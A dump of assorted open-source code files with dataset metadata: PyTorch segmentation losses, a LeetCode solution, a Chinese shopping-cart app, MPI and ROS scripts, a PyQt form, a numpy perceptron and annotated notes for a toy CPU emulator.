torch.mean(self.dice_loss(input, target))\n if weight is None:\n y_1 = torch.mean(self.cross_entropy_loss.forward(input, target))\n else:\n y_1 = torch.mean(\n torch.mul(self.cross_entropy_loss.forward(input, target), weight))\n return y_1 + y_2\n\n\nclass CombinedLoss_KLdiv(_Loss):\n \"\"\"\n A combination of dice and cross entropy loss\n \"\"\"\n\n def __init__(self):\n super(CombinedLoss_KLdiv, self).__init__()\n self.cross_entropy_loss = CrossEntropyLoss2d()\n self.dice_loss = DiceLoss()\n\n def forward(self, input, target, weight=None):\n \"\"\"\n Forward pass\n\n \"\"\"\n input, kl_div_loss = input\n # input_soft = F.softmax(input, dim=1)\n y_2 = torch.mean(self.dice_loss(input, target))\n if weight is None:\n y_1 = torch.mean(self.cross_entropy_loss.forward(input, target))\n else:\n y_1 = torch.mean(\n torch.mul(self.cross_entropy_loss.forward(input, target), weight))\n return y_1, y_2, kl_div_loss\n\n\n# Credit to https://github.com/clcarwin/focal_loss_pytorch\nclass FocalLoss(nn.Module):\n \"\"\"\n Focal Loss for Dense Object Detection\n \"\"\"\n\n def __init__(self, gamma=2, alpha=None, size_average=True):\n\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.alpha = alpha\n if isinstance(alpha, (float, int)):\n self.alpha = torch.Tensor([alpha, 1 - alpha])\n if isinstance(alpha, list):\n self.alpha = torch.Tensor(alpha)\n self.size_average = size_average\n\n def forward(self, input, target):\n \"\"\"Forward pass\n\n :param input: shape = NxCxHxW\n :type input: torch.tensor\n :param target: shape = NxHxW\n :type target: torch.tensor\n :return: loss value\n :rtype: torch.tensor\n \"\"\"\n\n if input.dim() > 2:\n # N,C,H,W => N,C,H*W\n input = input.view(input.size(0), input.size(1), -1)\n input = input.transpose(1, 2) # N,C,H*W => N,H*W,C\n input = input.contiguous().view(-1, input.size(2)) # N,H*W,C => N*H*W,C\n target = target.view(-1, 1)\n\n logpt = F.log_softmax(input, dim=1)\n logpt = logpt.gather(1, target)\n logpt = logpt.view(-1)\n pt = Variable(logpt.data.exp())\n\n if self.alpha is not None:\n if self.alpha.type() != input.data.type():\n self.alpha = self.alpha.type_as(input.data)\n at = self.alpha.gather(0, target.data.view(-1))\n logpt = logpt * Variable(at)\n\n loss = -1 * (1 - pt) ** self.gamma * logpt\n if self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n\nclass KLDCECombinedLoss(nn.Module):\n \"\"\"\n Combined loss of KL-Divergence and CrossEntropy.\n \"\"\"\n\n def __init__(self, gamma_value=1, beta_value=1.1):\n super(KLDCECombinedLoss, self).__init__()\n self.cross_entropy_loss = CrossEntropyLoss2d()\n self.dice_loss = DiceLoss()\n self.beta_value = beta_value\n self.gamma_value = gamma_value\n\n def forward(self, inp, target, weight=(None, None)):\n \"\"\"\n\n :param inp: tuple with (prior, posterior, predicted_y), prior, posterior can be dict for multi-layer KLDiv.\n :param target: Tensor (Ground truth)\n :param weight: Tuple, (None, None) | (False, False) | (weights, class_weights) and any mix\n :return: dice_loss, CE_loss, KL_div_loss, total_loss\n \"\"\"\n prior, posterior, y_p = inp\n if target is not None:\n target = target.type(torch.long)\n\n dice_loss = torch.tensor([0]).type(torch.FloatTensor)\n cross_entropy_loss = torch.tensor([0]).type(torch.FloatTensor)\n kl_div_loss = torch.tensor([0]).type(torch.FloatTensor)\n criterion = nn.KLDivLoss(reduction='batchmean')\n w, cw = weight\n if w is None:\n dice_loss = torch.mean(self.dice_loss(y_p, target))\n elif w is not False:\n dice_loss = torch.mean(torch.mul(self.dice_loss(y_p, target), w))\n\n if cw is None:\n cross_entropy_loss = torch.mean(self.cross_entropy_loss.forward(y_p, target))\n elif cw is not False:\n cross_entropy_loss = torch.mean(\n torch.mul(self.cross_entropy_loss.forward(y_p, target), cw))\n\n if prior is not None and posterior is not None:\n if type(prior) is dict and type(posterior) is dict:\n for i, j in zip(prior, posterior):\n # kl_div_loss += criterion(F.log_softmax(posterior[j].type(torch.FloatTensor), dim=0),\n # F.softmax(prior[i].type(torch.FloatTensor), dim=0))\n kl_div_loss += self.loss_to_normal(posterior[j]) + self.loss_to_normal(prior[i])\n else:\n\n # kl_div_loss = criterion(F.log_softmax(posterior.type(torch.FloatTensor), dim=0),\n # F.softmax(prior.type(torch.FloatTensor), dim=0))\n kl_div_loss += self.loss_to_normal(posterior) + self.loss_to_normal(prior)\n\n if posterior is not None and prior is None:\n kl_div_loss = posterior\n\n dice_loss = dice_loss.cuda(0)\n cross_entropy_loss = cross_entropy_loss.cuda(0)\n kl_div_loss = kl_div_loss.cuda(0)\n\n cumulative_loss = dice_loss + cross_entropy_loss + kl_div_loss\n\n cumulative_loss = cumulative_loss.cuda(0)\n\n return dice_loss, cross_entropy_loss, kl_div_loss, cumulative_loss\n\n def loss_to_normal(self, tup):\n mu, logvar = tup\n mu, logvar = mu.type(torch.FloatTensor), logvar.type(torch.FloatTensor)\n KLD_ = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n return KLD_\n \nclass KLDivLossFunc(nn.Module):\n\n def __init__(self, beta_value=1):\n super(KLDivLossFunc, self).__init__()\n self.beta_value = beta_value\n\n def forward(self, inp, target):\n \"\"\"Forward pass\n :param inp:\n :type inp: input data tensor\n :param target: shape = NxHxW\n :type target: torch.tensor\n :return: combined loss value\n :rtype: torch.tensor\n \"\"\"\n criterion = nn.KLDivLoss(reduction='batchmean')\n kldivloss = criterion(F.log_softmax(target.type(torch.FloatTensor), dim=0),\n F.softmax(inp.type(torch.FloatTensor), dim=0)).cuda()\n\n return kldivloss\n\n @staticmethod\n def loss_to_normal(z_mu, z_var):\n kl_loss = 0.5 * torch.sum(torch.exp(z_var) + z_mu ** 2 - 1. - z_var)\n return kl_loss\n\n","sub_path":"build/lib/nn_common_modules/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"19533145","text":"\"\"\"\n本题思路比较简单,首先要满足的条件是所有汽油的量要大于等于路上消耗的量,否则不可能跑完全程\n然后就是开始找一个起点,当某个点的汽油量足以支撑到下一个点时,认为可以开始.然后向后走,看能否走完全程,走不完就找到下一个可以开始的点继续.\n但是这么暴力的遍历的话,时间复杂度是n^2,可以用合适的贪心算法去优化.\n可以稍微想一想:如果从A走到B失败了,其实从A到A+1资源剩余是大于等于0的,那么从AB之间的任一点出发到B的资源更为紧张,所以从AB之间任一点出发都不可能到达B了,\n接下来选定B作为起始点即可.这样大大减少了起始点的数量,也省了不少时间\n\"\"\"\nclass Solution(object):\n def canCompleteCircuit(self, gas, cost):\n \"\"\"\n :type gas: List[int]\n :type cost: List[int]\n :rtype: int\n \"\"\"\n if sum(gas) - sum(cost) < 0:\n return -1\n l = len(gas)\n i = 0\n while i < l:\n if gas[i] - cost[i] >= 0:\n remain = 0\n j = 0\n start = i\n for j in range(i, i + l):\n remain += (gas[j % l] - cost[j % l])\n if remain < 0:\n i = j % l\n if i < start:\n return -1\n break\n if j == start + l - 1:\n return start\n i += 1\n return -1\n\n\nif __name__ == '__main__':\n sol = Solution()\n gas = [1, 2, 3, 4, 5]\n cost = [3, 4, 5, 1, 2]\n print(sol.canCompleteCircuit(gas, cost))\n","sub_path":"101-200/134.py","file_name":"134.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"184074934","text":"# 实现一个简单的商城购物系统\nfrom bll import handles\nfrom dal import shopping_goods_data\n\n\ndef shopping():\n\n\n prompt = \"您好,欢迎使用薯条橙子在线购物系统chipscoco,输入<>中对应的指令来使用购物系统:\\n\" \\\n \"<1>:查看所有商品\\n<2>:对商品按售价进行排序(asc表示升序,desc表示降序)\\n\" \\\n \"<3>:添加商品到购物车\\n<4>:查看购物车\\n<5>:删除购物车指定商品\\n<6>:下单结账\\n<0>:退出系统\"\n\n commands = {1: handles.show_all_goods, 2: handles.sort_goods, 3: handles.add_goods, 4: handles.show_shopping_cart,\n 5: handles.remove_goods, 6: handles.shopping_cart_paybill }\n # commands 是数字编号+函数的内存地址\n\n while True:\n print(prompt)\n command = int(input(\"输入指令:__\\b\\b\"))\n if command in commands:\n commands[command](shopping_goods_data.CHIPSCOCO)\n # 因为把 shopping_goods_data 作为模块分出去以后,这里再调用chipscoco就要\n # 加上模块名了\n elif command == 0:\n break\n else:\n print(\"您输入了非法的指令\")\n input(\"按下键盘任意键,继续使用系统......\")\n\n\nif __name__ == \"__main__\":\n shopping()\n","sub_path":"chipsprange/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"466803598","text":"import random\r\n\r\nx = random.randint(1, 6)\r\ny = random.random()\r\n\r\nmyList = ['rock', 'paper', 'scissors']\r\nresult = random.choice(myList)\r\nprint(result)\r\ncards = [1,2,3,4,5,6,7,8,9, \"J\", \"Q\", \"K\", \"A\"]\r\n\r\nrandom.shuffle(cards)\r\n\r\nprint(cards)","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"407926796","text":"import sys\nimport argparse\nimport time\n\nsys.path.append(\"/home/hadoop/hiro_tests/\")\nimport hiroStatAndMatchDefault as hiro\n\nparser = argparse.ArgumentParser(description=\"Outputs default Hiro stat and match tests from input file\")\nparser.add_argument(\"--s3loc\", help=\"Match file. Should be only one column\")\nparser.add_argument(\"--ticket\", help=\"The relevant JIRA ticket. To be used for saving match_test outputs\")\nparser.add_argument(\"--test\", default=\"all\", choices=[\"stat\",\"match\",\"all\"], help=\"Type of test desired. Choices: [stat,match,all]. Default is all\")\nparser.add_argument(\"--htype\", default=\"md5\", choices=[\"md5\",\"sha1\",\"sha2\"], help=\"Type of hem in the original client file\")\nargs = parser.parse_args()\n\nif args.ticket:\n ticket = args.ticket\nelse:\n timeId = str(int(time.time()))\n ticket = 'noTicket_%s' %(timeId)\n\nif args.htype:\n htype = args.htype\nelse:\n htype = 'md5'\n\nclientTest = hiro.defaultTest(clientFile=args.s3loc, ticket=ticket, hem=htype)\n\nif args.test == 'stat':\n clientTest.stat_test()\nelif args.test == 'match':\n clientTest.match_test()\nelse:\n clientTest.stat_test()\n clientTest.match_test()","sub_path":"emr_scripts/hiro_tests/hiroTerminal.py","file_name":"hiroTerminal.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254049345","text":"import mpids.MPInumpy as mpi_np\nimport numpy as np\nfrom mpi4py import MPI\nfrom operations import _max, _mean, _sum, _std\n\nif __name__ == '__main__':\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n n_procs = comm.Get_size()\n size = 2**25\n iters = 1\n mpi_np_arr = mpi_np.arange(size, dtype=np.float64)\n\n max_time = _max(mpi_np_arr, iters=iters)\n mean_time = _mean(mpi_np_arr, iters=iters)\n sum_time = _sum(mpi_np_arr, iters=iters)\n std_time = _std(mpi_np_arr, iters=iters)\n\n if rank == 0:\n print(\"mpi_np,max,%d,%d,%.9f\" %(n_procs, size, max_time))\n print(\"mpi_np,mean,%d,%d,%.9f\" %(n_procs, size, mean_time))\n print(\"mpi_np,sum,%d,%d,%.9f\" %(n_procs, size, sum_time))\n print(\"mpi_np,std,%d,%d,%.9f\" %(n_procs, size, std_time))\n","sub_path":"MPInumpy/Strong/reductions_mpi_np.py","file_name":"reductions_mpi_np.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113151606","text":"from PyQt5.QtCore import Qt, pyqtSlot\n\nfrom resources.ui.python.ParticipantWidget_ui import Ui_frmParticipant\nfrom libopenimu.models.Participant import Participant\nfrom libopenimu.qt.DataEditor import DataEditor\n\n\nclass ParticipantWindow(DataEditor):\n\n participant = Participant()\n dbMan = None\n\n def __init__(self, dbManager, participant=None, parent=None, default_group = None):\n super().__init__(parent=parent)\n self.UI = Ui_frmParticipant()\n self.UI.setupUi(self)\n\n self.participant = participant\n self.dbMan = dbManager\n self.data_type = \"participant\"\n\n # Signals / Slots connections\n self.UI.btnCancel.clicked.connect(self.cancel_clicked)\n self.UI.btnSave.clicked.connect(self.save_clicked)\n self.UI.txtName.textEdited.connect(self.name_edited)\n self.UI.txtDesc.textChanged.connect(self.desc_edited)\n self.UI.cmbGroups.currentIndexChanged.connect(self.group_edited)\n\n # Load groups\n groups = self.dbMan.get_all_groups()\n self.UI.cmbGroups.clear()\n self.UI.cmbGroups.addItem(\"Aucun\", userData=None)\n\n for group in groups:\n self.UI.cmbGroups.addItem(group.name, userData=group.id_group)\n\n # Update data\n self.update_data()\n\n # Set default group for new participants\n if default_group is not None:\n self.UI.cmbGroups.setCurrentIndex(self.UI.cmbGroups.findData(default_group.id_group, Qt.UserRole))\n\n self.enable_buttons(False)\n\n def validate(self):\n rval = True\n if self.UI.txtName.text() == '':\n self.UI.txtName.setStyleSheet('background-color: #ffcccc;')\n rval = False\n else:\n self.UI.txtName.setStyleSheet('background-color: rgba(226, 226, 226, 90%);')\n\n if self.UI.cmbGroups.currentIndex == -1:\n rval = False\n\n return rval\n\n def update_data(self):\n if self.participant is not None:\n self.UI.txtName.setText(self.participant.name)\n self.UI.txtDesc.setPlainText(self.participant.description)\n # if self.participant.group is not None and self.participant.group.name is not None:\n # self.UI.lblGroupValue.setText(self.participant.group.name)\n # else:\n # self.UI.lblGroupValue.setText(\"Aucun\")\n self.UI.cmbGroups.setCurrentIndex(self.UI.cmbGroups.findData(self.participant.id_group))\n else:\n self.UI.txtName.setText(\"\")\n self.UI.txtDesc.setPlainText(\"\")\n self.UI.cmbGroups.setCurrentIndex(0)\n\n def enable_buttons(self, enable):\n self.UI.btnCancel.setEnabled(enable or self.participant is None)\n self.UI.btnSave.setEnabled(enable)\n\n def update_modified_status(self):\n self.enable_buttons(\n (self.participant is not None and self.UI.txtName.text() != self.participant.name) or\n (self.participant is None and self.UI.txtName.text() != \"\") or\n (self.participant is not None and self.UI.txtDesc.toPlainText() != self.participant.description) or\n (self.participant is None and self.UI.txtDesc.toPlainText() != \"\") or\n (self.participant is not None and self.UI.cmbGroups.currentData() != self.participant.id_group)\n )\n @pyqtSlot()\n def save_clicked(self):\n if self.validate():\n if self.participant is None:\n self.participant = Participant()\n self.participant.name = self.UI.txtName.text()\n self.participant.description = self.UI.txtDesc.toPlainText()\n self.participant.id_group = self.UI.cmbGroups.currentData()\n self.participant = self.dbMan.update_participant(self.participant)\n self.enable_buttons(False)\n self.dataSaved.emit()\n\n @pyqtSlot()\n def cancel_clicked(self):\n self.update_data()\n self.dataCancelled.emit()\n\n @pyqtSlot(str)\n def name_edited(self, new_value):\n self.update_modified_status()\n\n @pyqtSlot()\n def desc_edited(self):\n self.update_modified_status()\n\n @pyqtSlot()\n def group_edited(self):\n self.update_modified_status()","sub_path":"python/libopenimu/qt/ParticipantWindow.py","file_name":"ParticipantWindow.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483988336","text":"import pytest\n\nfrom .steps.get_games_by_user_uc_steps import ShouldGetTypeGamesByUserSteps\nfrom src.bp.domain import TypeGame\n\nTYPE_GAMES__RETURN_DATA = [\n {\n TypeGame(1, \"game1\", \"image1\", \"ARCADE\", \"PSICO\", \"20\", \"Puntos\"),\n TypeGame(2, \"game2\", \"image2\", \"ARCADE\", \"ING\", \"10\", \"Puntos\"),\n TypeGame(3, \"game3\", \"image3\", \"ARCADE\", \"MED\", \"30\", \"Puntos\"),\n }\n]\n\nUSER_ID_DATA = \"test_user_get_type_games\"\n\n\n@pytest.mark.parametrize(\n \"user_id, type_games\", [(USER_ID_DATA, TYPE_GAMES__RETURN_DATA)]\n)\ndef test_should_get_all_type_question(user_id, type_games):\n steps = ShouldGetTypeGamesByUserSteps()\n steps.given(user_id, type_games)\n steps.when()\n steps.then()\n","sub_path":"tests/bptest/get_type_games_by_user_use_case_test.py","file_name":"get_type_games_by_user_use_case_test.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449510894","text":"#!/usr/bin/env python\n\nimport serial\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nimport time\nleft_speed = \"\"\nright_speed = \"\"\nmotor_1_string = \"\"\nmotor_2_string = \"\"\nmotor_max_val = 2047; #define the maximum speed for a given motor\n\nser = serial.Serial(port = \"/dev/ttyACM0\",baudrate = 9600)\nif ser.isOpen:\n\tser.write(\"M1: \"+str(0)+\"\\r\\n\") #ensure that motors are stopped when the node is initialized\n\tser.write(\"M2: \"+str(0)+\"\\r\\n\") #ensure that motors are stopped when the node is initialized\nser.close()\nser.open()\n\ndef message_cb(data):\n# rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data.data)\n left_speed = (data.linear.x - data.angular.z)*2047;\n left_speed = min(motor_max_val,left_speed); #set to max if it goes over\n left_speed = max(-motor_max_val,left_speed); #set to max if it goes over\n ser.write(\"M1: \" + str(int(left_speed)) + \"\\r\\n\")\n # rospy.loginfo(\"left_speed: \" + str(left_speed));\n\n # rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data.data)\n right_speed = (data.linear.x + data.angular.z)*2047;\n right_speed = min(motor_max_val,right_speed); #set to max if it goes over\n right_speed = max(-motor_max_val,right_speed); #set to max if it goes over\n ser.write(\"M2: \" + str(int(right_speed)) + \"\\r\\n\")\n # rospy.loginfo(\"right_speed: \" + str(right_speed));\n\ndef listener():\n rospy.init_node('sabertooth_control', anonymous=True)\n rospy.Subscriber(\"cmd_vel\", Twist, message_cb)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n #with serial.Serial(port = \"/dev/ttyACM0\",baudrate = 9600) as ser: \n# while True:\n listener()\n # motor_1_string = \"M1: \" + left_speed + \"\\r\\n\"\n # motor_2_string = \"M2: \" + right_speed + \"\\r\\n\"\n #ser.write(\"M1: \"+left_speed+\"\\r\\n\")\n\t #ser.write(\"M2: \"+right_speed+\"\\r\\n\")\n\t #ser.write(motor_1_string)\n #ser.write(motor_2_string)\n","sub_path":"plow_motor_control_py/scripts/sabertooth_drive.py","file_name":"sabertooth_drive.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"361722658","text":"import numpy as np\n\n\nclass MultiLayerPerceptron():\n def __init__(self, inputs, targets, n_hidden, beta):\n self.n_data = len(inputs)\n self.inputs = np.concatenate((inputs, -np.ones((self.n_data, 1))), axis=1)\n self.targets = targets\n self.n_in = inputs.shape[1] # Number of attributes\n self.n_out = targets.shape[1] # Number of outputs\n self.n_hidden = n_hidden # Number of hidden neurons\n self.beta = beta\n\n self.weights1 = np.random.randn(self.n_in + 1, n_hidden) * 0.1 - 0.05\n self.weights2 = np.random.randn(self.n_hidden + 1,\n self.n_out) * 0.1 - 0.05\n\n def train(self, eta, iterations):\n\n for n in range(iterations):\n\n self.outputs = self.fwd(self.inputs)\n error = 0.5 * sum((self.targets - self.outputs)**2)\n print(\"Iteration: \" + str(n) + '\\t' + \"Error: \" + str(error))\n\n deltao = (self.outputs - self.targets) * self.outputs * (1.0 - self.outputs)\n deltah = self.hidden * (1.0 - self.hidden) * \\\n np.dot(-deltao, np.transpose(self.weights2))\n\n updatew1 = np.zeros((np.shape(self.weights1)))\n updatew2 = np.zeros((np.shape(self.weights2)))\n\n updatew1 = eta * np.dot(np.transpose(self.inputs), deltah[:, :-1])\n updatew2 = eta * np.dot(np.transpose(self.hidden), deltao)\n\n self.weights1 += updatew1\n self.weights2 -= updatew2\n\n def fwd(self, inputs):\n\n # If inputs are not the same as inputs stored in the nn object add column of ones\n if not np.array_equal(inputs, self.inputs):\n inputs = np.concatenate((inputs, -np.ones((len(inputs), 1))), axis=1)\n\n self.hidden = np.dot(inputs, self.weights1)\n self.hidden = 1.0 / (1.0 + np.exp(-self.beta * self.hidden))\n self.hidden = np.concatenate((self.hidden, -np.ones((inputs.shape[0], 1))), axis=1)\n outputs = np.dot(self.hidden, self.weights2)\n outputs = 1.0 / (1.0 + np.exp(-self.beta * outputs))\n\n return outputs\n\n def confmat(self, inputs, outputs):\n \"\"\"\n UNFINISHED\n \"\"\"\n\n nn_outputs = np.where(self.fwd(inputs) > 0.5, 1, 0)\n\n return nn_outputs\n","sub_path":"src/ml_algorithms/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343454405","text":"\"\"\"\nNumber Bases\n_________________________________\n\nIt's the \"language\" that a number is written down in\n\nDouze(french) == (english)Twelve\nsame thing!!\n\n1100(binary) == 12 \nsame thing!!\n\nbase 2: binary\nbase 8: Octal(rarely used)\nbase 10: decimal (what we know from grade school)\nbase 16: hexadecimal \"hex\"\nbase 64: base 64\n\nbase 10(decimal)\n\n\n\n\n|<----- 1000's place 10^3\n||<----- 100's place 10^2\n|||<---- 10's place 10^1\n||||<---- 1's place 10^0\nabcd\n1234\n1 1000\n2 100s\n3 10s\n4 1s\n\n1234 = 1 * 1000 + 2 * 100 + 3 + 10 + 4 * 1\n ^ ^ ^ ^\n\n\nFor Hexadecimal, our digits are represented\nby 0-9, and then A-F\nand each place value is the next 16th power\n\nHere's a binary conversion\n\n|<----- 8's place 2^3\n||<----- 4's place 2^2\n|||<---- 2's place 2^1\n||||<---- 1's place 2^0\nabcd\n\n0011 binary\n\n0011 binary == 0 * 8 + 0 * 4 + 1 * 2 + 1 * 1 == 3 decimal\n\n*** FOR ANY NUMBER BASE, YOU CAN PUT ANY NUMBER OF LEADING 0'S***\n\nbinary digits == (\"bit\")\n\n8 bits == \"byte\"\n\nOne byte is the most common standard unit of memory used for our CPU\n\n4 bits == \"nybble\"\n\nThe number base only matters\nwhen you write the number down.\nOnce it's inside of a machine, the\nnumber base doesn't matter.\n\nDefault languages work in base 10 most of the time.\n\nTo specify the base in code:\nPrefix\n______\n[none] decimal\n0b binary\n0x hex\n0o octal\n\nbases only matter when you want to print it out\nall numeric values are simply numeric values\nwritten in one language or another\n\nAs the base number gets bigger, \nthe amount of digits required to represent\na numerical value goes down.\n\n4 bits(One nybble) are(is) required to store\none hex digit.\n\n\nConverting from binary to hex is very easy!\nNybbles align the digit counting between binary and hexadecimal very well.\nWhen converting, just chop up a binary number into 4's\nand then translate!\n\"\"\"\n\n# Beej's Emulator\n# Memory works like a giant array\n# Think of your RAM as a massive Array\n# In the computer, we have a RAM which contains memory\n\n\n# Index into the memory array\n# Address\n# Location\n# Pointer\n# The above all mean the same thing!!\n\n# For Tonight's assignment, do this in base 2 instead of base 10\n# The above code prints all lines of a given file\n# it'll print line by line, but we still need to make sure\n# to avoid all whitespace\n# avoid all comments\n# avoid all blank lines\n# print out errors for non-commands\n\nmemory = [0] * 256\n\n# This is a \"Data Driven\" program.\n# We have to pass in a file to this program in order to get output\n\nimport sys\n\nif len(sys.argv) !=2:\n print(\"usage: comp.py filename\")\n sys.exit(1)\n\ntry:\n address = 0\n\n with open(sys.argv[1]) as f:\n for line in f:\n t = line.split('#')\n n = t[0].strip()\n\n try:\n\n n = int(n)\n except ValueError:\n print(f\"Invalid Number {n}\")\n sys.exit(1)\n if n == '':\n continue\n\n print(repr(n))\n memory[address] = n\n address += 1\n\nexcept FileNotFoundError:\n print(f\"File not found: {sys.argv[1]}\")\n sys.exit()\n\nregister = [0] * 8 # represent r0 - r7\n\n# \"Variables\" in hardware, known as \"registers\"\n# There are a fixed number of registers\n# They have fixed names\n# On the LS8, they're called...\n# R1 R2 R3 R4 R5 R6 R7\n\n\npc = 0# Program Counter, address of the currently-executing instruction\n# Give the register for the stack pointer a symbolic name\n# So that developers know where it is\nSP = 7\nregister[SP] = 0xF4\n\ndef push_value(value):\n # Decrement SP\n register[SP] -= 1\n\n # copy the value to the SP address\n top_of_stack_addr = register[SP]\n memory[top_of_stack_addr] = value\n\n\ndef pop_value():\n \n # Get the top of stack addr\n top_of_stack_addr = register[SP]\n\n # Get the value of the top of stack\n value = memory[top_of_stack_addr]\n\n # Increment SP\n register[SP] += 1\n\n return value\n\n\n\nrunning = True\n\nwhile running:\n ir = memory[pc] # Instruction Register\n # This holds a copy of the currently executing instruction\n \n if ir == 1:\n print(\"David\")\n pc += 1\n elif ir == 2:\n running = False\n\n elif ir == 3: # Save Reg\n reg_num = memory[pc + 1]\n value = memory[pc + 2]\n register[reg_num] = value\n print(register)\n pc += 3\n\n elif ir == 4: # Print_reg\n reg_num = memory[pc + 1]\n print(register[reg_num])\n pc += 2\n\n elif ir == 5: # PUSH\n # Get the reg num to push\n reg_num = memory[pc + 1]\n\n # Get the value to push\n value = register[reg_num]\n\n push_value(value)\n\n # print(memory[0xea:0xf4])\n\n pc += 2\n\n elif ir == 6: # POP\n # Get the reg to pop into\n reg_num = memory[pc + 1]\n\n value = pop_value()\n\n #Store the value in the register\n register[reg_num] = value\n\n # Increment SP\n register[SP] += 1\n\n pc += 2\n\n print(memory[0xea:0xf4])\n\n elif ir == CALL:\n\n # Compute the return addr\n return_addr = pc + 2\n\n # Push the return addr on stack\n push_value(return_addr)\n\n # get the value from the operand reg\n reg_num = memory[pc + 1]\n value = register[reg_num]\n\n # set the pc to that value\n pc = value\n\n else:\n print(f\"Unknown Instruction {ir}\")\n\n\n# For moving the PC, use an if else statement which checks\n# the fourth bit of the instruction. if that fourth bit is\n# true, then the instruction sets the value and we can continue.\n# if that fourth bit is false, then set the pc to the new value.\n\n\n\n# inst_sets_pc = (ir >> 4) & 1 == 1:\n\n\n# if not inst_sets_pc:\n\n#_________________________________________________\n# Instruction location\n# \"POP register\"\n# copy the value from the address pointed to by the stack pointer,\n# put it at the given register\n# increment the SP(Stack works Top-Down)\n#_____________________________________________\n# Instruction location\n# \"PUSH register\"\n# Decrement the stack pointer\n# place the value at the given register\n# Stack pointer points at the item most recently pushed\n# \n\n\n### The above is a very basic emulation\n### Memory has numbers. Those numbers\n# have meaning, and we can tell the computer\n# what those meanings are.\n\n# Interrupts are a stretch goal\n\n\n#______________________________________________________________\n# Frame the Plan from Inputs to Outputs\n# Parsing, Normalize, Sanitize\n# all mean the same thing\n# Take the data, and make it into the same format\n\n\n#____________________________________________________________\n# CPU Stack notes\n\n# These are just like the stack data structure we know\n\n# Push and Pop are standard\n\n# Stack data is stored in RAM\n\n# The \"Stack Pointer\" keeps track of the address of the top of the stack.\n\n# Typically the stackgrows down from the higher memory addresses\n\n#__________________________\n# A Minimal Stack\n\n# A stack needs somewhere to store data: RAM in this case\n\n# A stack needs to keep track of where the top of the stack is: stack pointer\n\n# A Stack needs functionality to push and pop, like always. Push and pop instructions\n\n# In order to store something(PUSH)\n# We first decrement the stack pointer\n# then push the value onto the memory address which the stack pointer is pointing at\n# Decrement stack pointer -> push value to that address\n\n# In order to remove something(POP)\n# We POP it into a Register\n# POP the value at the stack pointer and copy it into Register\n# Increment the stack pointer\n# First, copy the value, POP it onto the register. Then Increment the SP\n# This doesn't remove values from the stack, but it copies them to a register\n# When we push onto the stack, it overrwrites values\n\n# The stack is typically used to store variables\n# Also used to return addresses from a subroutine\n# Storage of registers and CPU state while handling an interrupt\n# Allocation of local variables for a subroutine\n\n# If you PUSH too many items on the stack, you'll begin to \n# overwrite values \n\n# If you POP from an empty stack, you'll copy NONE onto a register\n\n# Check if a stack is empty by trying to POP from it\n\n# What information must be saved on the stack when the CPU is servicing\n# an interrupt? Why? The current state of the processor, and all of it's\n# counters, registers, and flags. This is all saved so that it can\n# handle the interruption and then pick back up where it left off\n\n\n#________________________________________________________________\n# CPU Interrupts\n\n# Interrupts are commonly generated by peripherals(keyboard, mouse)\n# who need to alert the CPU that some work needs to be done.\n\n# When an interrupt occurs, the current state of the processor is saved\n# on the stack, and execution continues at the address of the interrupt handler.\n\n# Most CPU's have a lookup table: Interrupt Vector Table.\n# This is an array of interrupts to tell the PC how to handle each one.\n# It's an array of pointers to handlers, one per interrupt.\n# Different CPU's keep the table in different areas of RAM\n\n#______________________________________________________\n# Beej's notes\n\n# Stacks are ALWAYS USED for CPU's\n\n# Stack is good for:\n\n# Temporarily storing values\n# Making subroutines possible\n# Implementing local variables\n\n\n# It's easy to implement in the CPU hardware\n\n\n# Conditionals are what we're missing from our emulator\n\n# How does the stack work?\n\n# Low level Stack concept will be used. Boil the stack down\n# to it's purest essence. In the case of a CPU, we just need\n# to be able to push and pop. memory and location is handled by RAM.\n# The stack pointer points to the top of the stack.\n# The stack pointer is a general purpose register\n\n# Stacks start from TOP-DOWN\n# if it's empty, it always points to the top(f4)\n#_________________________________________________\n# Instruction location\n# \"POP register\"\n# copy the value from the address pointed to by the stack pointer,\n# put it at the given register\n# increment the SP(Stack works Top-Down)\n#_____________________________________________\n# Instruction location\n# \"PUSH register\"\n# Decrement the stack pointer\n# place the value at the given register\n# Stack pointer points at the item most recently pushed\n#\n\n\n#____________________________________________________________________________\n#################### Subroutines #############################\n\n# Think of subroutines in a CPU as functions in higher-level languages\n\n# In assembly, we \"CALL\" a subroutine at a particular address.\n\n# Then we \"RET\"(return) from that subroutine to pick up where we left off, just like a function\n# does in a higher level language.\n\n####### Limitations with assembly-level subroutines\n# CPU's are pretty simple machines.\n# No arguments. Only takes one operand\n# No return values. \n# These can be implemented in a variety of ways (as you'll learn)\n\n###### 